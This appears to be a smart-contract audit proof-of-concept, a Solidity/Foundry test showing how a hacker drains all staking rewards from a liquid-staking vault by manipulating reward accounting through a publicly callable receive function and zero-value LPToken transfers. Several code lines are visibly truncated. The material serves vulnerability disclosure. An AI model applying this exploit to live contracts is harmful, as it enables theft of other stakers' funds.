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Last active November 20, 2022 14:36
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rewards theft in staking vault
pragma solidity ^0.8.13;
import "forge-std/console.sol";
import { StakingFundsVault } from "../../contracts/liquid-staking/StakingFundsVault.sol";
import { LPToken } from "../../contracts/liquid-staking/LPToken.sol";
import {
} from "../utils/TestUtils.sol";
contract POCStakingFundsVaultTest is TestUtils {
address operations = accountOne;
MockLiquidStakingManager liquidStakingManager;
StakingFundsVault vault;
uint256 maxStakingAmountPerValidator;
function setUp() public {
factory = createMockLSDNFactory();
liquidStakingManager = deployDefaultLiquidStakingNetwork(factory, admin);
manager = liquidStakingManager;
vault = liquidStakingManager.stakingFundsVault();
maxStakingAmountPerValidator = vault.maxStakingAmountPerValidator();
// set up BLS keys required to initials registered
MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyOne, 1);
MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyTwo, 1);
MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyThree, 1);
liquidStakingManager.setIsPartOfNetwork(blsPubKeyOne, true);
liquidStakingManager.setIsPartOfNetwork(blsPubKeyTwo, true);
liquidStakingManager.setIsPartOfNetwork(blsPubKeyThree, true);
/* Hacker can steal all rewards because of the interaction between the accumulatedETHPerLPShare and claimed variables in `SyndicateRewardsProcessor`
* and because the LPToken `transfer` function as well as the `receive` function are publicly available.
* In a nutshell, the hacker can claim his rewards as expected but then by sending more ether to the contract (because receive is publicly available), he can manipulate `accumulatedETHPerLPShare`
* and also the `claimed` variables. And since `due` is assigned instead of accumulated in the statement `claimed[_user][_token] = due;` in function `_distributeETHRewardsToUserForToken`, the hacker
* can reset his claimed amount and claim again. This can be done by calling the `claimRewards` functions if the require statements still allow it or he can even more simply call the public `transfer`
* function of the LPToken that would bypass all the requires and triggers  `_updateAccumulatedETHPerLP` and `_distributeETHRewardsToUserForToken`. This is what I've done in this PoC.
* Severity: Critical
function testCanStealAllRewards() public {
address user = accountOne;, 42 ether);
address nodeRunner = accountThree;, 42 ether);
address hacker = accountTwo;, 2 ether);
// register BLS key with the network
registerSingleBLSPubKey(nodeRunner, blsPubKeyFour, accountFive);
MockAccountManager(factory.accountMan()).setLifecycleStatus(blsPubKeyFour, 1);
liquidStakingManager.setIsPartOfNetwork(blsPubKeyFour, true);
vm.prank(user); vault.depositETHForStaking{value: 2 ether}(blsPubKeyFour, 2 ether);
// The hacker deposits 2 ether to be part of the stakers and later claim rewards. This is as expected for any invested user.
vault.depositETHForStaking{value: 2 ether}(blsPubKeyFour, 2 ether);
// Do a deposit of 24 ETH for savETH pool
liquidStakingManager.savETHVault().depositETHForStaking{value: 24 ether}(blsPubKeyFour, 24 ether);
LPToken token = vault.lpTokenForKnot(blsPubKeyFour);
vm.warp(block.timestamp + 3 hours);
// Reward ETH to the staking funds vault
uint256 rewardsAmount = 2 ether;, rewardsAmount);
assertEq(address(vault).balance, rewardsAmount);
// at this stage, the hacker is acting.
// His balance is 0 at the beginning.
assertEq(address(hacker).balance, 0);
vault.claimRewards(hacker, getBytesArrayFromBytes(blsPubKeyFour));
// Since two users have invested the same amount, they should share the rewards by half.
assertEq(address(hacker).balance, rewardsAmount / 2);
// However, If the hacker manipulates `accumulatedETHPerLPShare` via `totalRewardsReceived()`, he can take more rewards...
// so at this stage, the hacker changes the balance by simply sending 2 wei (explanation why 2 wei is right below) to the contract and consequently have the unprocessed amount > 0 in function `_updateAccumulatedETHPerLP`.
// *Explanation why 2 wei*: The amount to be transfered to trigger the vuln must satisfy the following property `amount_to_be_transfered * token.sharesOf(hacker) / token.totalShares >= 1`.
// In this example, the hacker has 2 ether of balance, and the totalShares is 4 ether because the derivatives have been minted only once, consequently `amount_to_be_transferred` must be >= 2 to trigger the vuln.
// Then, by calling transfer() on the token, he manually triggers `beforeTokenTransfer` and `afterTokenTransfer` of the StakingFundsVault.
// by doing it once, the due amount in function `_distributeETHRewardsToUserForToken` is almost 0 but not 0, therefore it allows entering the if block right below and overrides the `claimed[_user][_token]` amount with almost 0.
// Also, any address but zero would do here and in the next statement, the statement is just used to trigger the hook functions.
token.transfer(address(this), 0);
// and at this stage, since `claimed[_user][_token]` is almost 0, `((accumulatedETHPerLPShare * balance) / PRECISION) - claimed[_user][_token]` is almost the amount that was already claimed right before... so by either calling transfer
// or claimRewards once again, the hacker can double the rewards, i.e., rewards-1 in this example. He can do that any number of times necessary to capture all the rewards before other users do.
token.transfer(address(this), 0);
// and here we confirm that almost all the rewards have been captured.
// What's interesting to note is that the money invested in the contract to trigger the vuln (2 wei) is also reclaimed so there is no loss except 1 wei to run the vuln and pass the if blocks.
assertEq(address(hacker).balance, rewardsAmount-1); // all the rewards minus 1 wei has been captured instead of the expected rewards/2...
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